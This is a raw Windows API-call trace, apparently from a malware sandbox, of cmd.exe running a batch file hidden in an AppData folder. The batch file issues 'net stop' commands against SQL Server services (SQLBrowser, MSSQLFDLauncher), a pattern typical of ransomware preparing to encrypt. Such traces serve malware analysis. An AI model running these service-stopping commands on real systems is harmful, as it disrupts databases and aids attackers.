[0207.512] _close (_FileHandle=3) returned 0 [0207.512] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0207.512] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0207.512] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0207.512] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0207.512] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0207.512] _wcsicmp (_String1="net", _String2="CD") returned 11 [0207.512] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0207.512] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0207.512] _wcsicmp (_String1="net", _String2="REN") returned -4 [0207.512] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0207.512] _wcsicmp (_String1="net", _String2="SET") returned -5 [0207.512] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0207.512] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0207.512] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0207.512] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0207.512] _wcsicmp (_String1="net", _String2="MD") returned 1 [0207.512] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0207.512] _wcsicmp (_String1="net", _String2="RD") returned -4 [0207.512] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0207.512] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0207.512] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0207.512] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0207.512] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0207.512] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0207.512] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0207.512] _wcsicmp (_String1="net", _String2="VER") returned -8 [0207.512] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0207.512] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0207.512] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0207.512] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0207.512] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0207.512] _wcsicmp (_String1="net", _String2="START") returned -5 [0207.512] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0207.512] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0207.513] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0207.513] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0207.513] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0207.513] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0207.513] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0207.513] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0207.513] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0207.513] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0207.513] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0207.513] SetErrorMode (uMode=0x0) returned 0x1 [0207.513] GetProcessHeap () returned 0x3e0000 [0207.513] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0207.513] GetProcessHeap () returned 0x3e0000 [0207.513] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0207.514] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0207.514] GetProcessHeap () returned 0x3e0000 [0207.514] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0207.514] GetProcessHeap () returned 0x3e0000 [0207.514] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0207.514] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0207.514] GetProcessHeap () returned 0x3e0000 [0207.514] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0207.514] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.514] GetProcessHeap () returned 0x3e0000 [0207.514] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0207.515] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0207.515] GetProcessHeap () returned 0x3e0000 [0207.515] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0207.515] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.515] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0207.516] GetLastError () returned 0x2 [0207.516] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0207.516] GetLastError () returned 0x2 [0207.516] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.517] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0207.517] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0207.517] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0207.517] GetLastError () returned 0x2 [0207.518] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0207.518] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0207.518] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.519] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0207.519] SetErrorMode (uMode=0x0) returned 0x1 [0207.519] GetProcessHeap () returned 0x3e0000 [0207.519] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0207.519] GetProcessHeap () returned 0x3e0000 [0207.519] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0207.519] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0207.519] GetProcessHeap () returned 0x3e0000 [0207.519] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0207.519] GetProcessHeap () returned 0x3e0000 [0207.519] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0207.520] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0207.520] GetProcessHeap () returned 0x3e0000 [0207.520] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0207.520] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.520] GetProcessHeap () returned 0x3e0000 [0207.520] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0207.520] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0207.520] GetProcessHeap () returned 0x3e0000 [0207.520] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0207.520] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.521] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0207.521] GetLastError () returned 0x2 [0207.521] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0207.521] GetLastError () returned 0x2 [0207.522] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.522] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0207.522] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0207.523] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0207.523] GetLastError () returned 0x2 [0207.523] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0207.523] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0207.524] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.524] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0207.524] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0207.524] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0207.524] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0207.524] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLBrowser /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLBrowser /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLBrowser /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xa58, dwThreadId=0x970)) returned 1 [0207.529] CloseHandle (hObject=0x78) returned 1 [0207.529] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0207.529] GetProcessHeap () returned 0x3e0000 [0207.529] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0207.529] GetEnvironmentStringsW () returned 0x3f8408* [0207.529] GetProcessHeap () returned 0x3e0000 [0207.529] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0207.529] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0207.529] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0207.657] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0207.657] CloseHandle (hObject=0x74) returned 1 [0207.657] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0207.657] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0207.657] GetProcessHeap () returned 0x3e0000 [0207.657] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0207.657] GetEnvironmentStringsW () returned 0x3f8408* [0207.657] GetProcessHeap () returned 0x3e0000 [0207.657] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0207.657] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0207.658] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0207.658] GetProcessHeap () returned 0x3e0000 [0207.658] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0207.658] GetEnvironmentStringsW () returned 0x3f8408* [0207.658] GetProcessHeap () returned 0x3e0000 [0207.658] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0207.658] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0207.658] GetProcessHeap () returned 0x3e0000 [0207.658] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0207.658] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0207.658] _get_osfhandle (_FileHandle=1) returned 0x264 [0207.658] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0207.658] _get_osfhandle (_FileHandle=1) returned 0x264 [0207.658] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0207.658] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0207.658] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0207.659] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0207.659] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0207.659] SetConsoleInputExeNameW () returned 0x1 [0207.659] GetConsoleOutputCP () returned 0x1b5 [0207.659] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0207.659] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.659] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0207.660] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0207.660] _get_osfhandle (_FileHandle=3) returned 0x74 [0207.660] SetFilePointer (in: hFile=0x74, lDistanceToMove=4298, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10ca [0207.660] GetProcessHeap () returned 0x3e0000 [0207.660] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0207.660] GetProcessHeap () returned 0x3e0000 [0207.660] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0207.660] GetProcessHeap () returned 0x3e0000 [0207.660] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0207.660] GetProcessHeap () returned 0x3e0000 [0207.660] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0207.660] GetProcessHeap () returned 0x3e0000 [0207.660] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0207.660] GetProcessHeap () returned 0x3e0000 [0207.660] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0207.660] GetProcessHeap () returned 0x3e0000 [0207.660] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0207.660] GetProcessHeap () returned 0x3e0000 [0207.660] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0207.660] GetProcessHeap () returned 0x3e0000 [0207.660] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0207.660] GetProcessHeap () returned 0x3e0000 [0207.660] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0207.660] GetProcessHeap () returned 0x3e0000 [0207.660] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0207.660] GetProcessHeap () returned 0x3e0000 [0207.660] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0207.660] GetProcessHeap () returned 0x3e0000 [0207.660] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0207.660] _get_osfhandle (_FileHandle=3) returned 0x74 [0207.660] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10ca [0207.661] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x7f7, lpOverlapped=0x0) returned 1 [0207.661] SetFilePointer (in: hFile=0x74, lDistanceToMove=4336, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10f0 [0207.661] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=38, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQLFDLauncher$SQL_2008 /y\r\n/y\r\n\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 38 [0207.661] _get_osfhandle (_FileHandle=3) returned 0x74 [0207.661] GetFileType (hFile=0x74) returned 0x1 [0207.661] _get_osfhandle (_FileHandle=3) returned 0x74 [0207.661] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10f0 [0207.661] GetProcessHeap () returned 0x3e0000 [0207.661] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0207.661] GetProcessHeap () returned 0x3e0000 [0207.661] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0207.664] _tell (_FileHandle=3) returned 4336 [0207.664] _close (_FileHandle=3) returned 0 [0207.664] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0207.665] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0207.665] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0207.665] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0207.665] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0207.665] _wcsicmp (_String1="net", _String2="CD") returned 11 [0207.665] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0207.665] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0207.665] _wcsicmp (_String1="net", _String2="REN") returned -4 [0207.665] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0207.665] _wcsicmp (_String1="net", _String2="SET") returned -5 [0207.665] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0207.665] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0207.665] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0207.665] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0207.665] _wcsicmp (_String1="net", _String2="MD") returned 1 [0207.665] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0207.665] _wcsicmp (_String1="net", _String2="RD") returned -4 [0207.665] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0207.665] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0207.665] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0207.665] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0207.665] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0207.665] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0207.665] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0207.665] _wcsicmp (_String1="net", _String2="VER") returned -8 [0207.665] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0207.665] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0207.665] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0207.665] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0207.665] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0207.665] _wcsicmp (_String1="net", _String2="START") returned -5 [0207.665] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0207.665] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0207.665] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0207.665] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0207.665] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0207.665] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0207.665] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0207.666] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0207.666] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0207.666] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0207.666] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0207.666] SetErrorMode (uMode=0x0) returned 0x1 [0207.666] GetProcessHeap () returned 0x3e0000 [0207.666] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0207.666] GetProcessHeap () returned 0x3e0000 [0207.666] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0207.666] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0207.666] GetProcessHeap () returned 0x3e0000 [0207.667] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0207.667] GetProcessHeap () returned 0x3e0000 [0207.667] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0207.667] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0207.667] GetProcessHeap () returned 0x3e0000 [0207.667] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0207.667] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.667] GetProcessHeap () returned 0x3e0000 [0207.667] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0207.667] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0207.667] GetProcessHeap () returned 0x3e0000 [0207.667] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0207.668] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.668] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0207.668] GetLastError () returned 0x2 [0207.669] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0207.669] GetLastError () returned 0x2 [0207.669] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.670] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0207.670] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0207.670] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0207.670] GetLastError () returned 0x2 [0207.671] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0207.671] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0207.671] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.672] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0207.672] SetErrorMode (uMode=0x0) returned 0x1 [0207.672] GetProcessHeap () returned 0x3e0000 [0207.672] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0207.672] GetProcessHeap () returned 0x3e0000 [0207.672] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0207.672] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 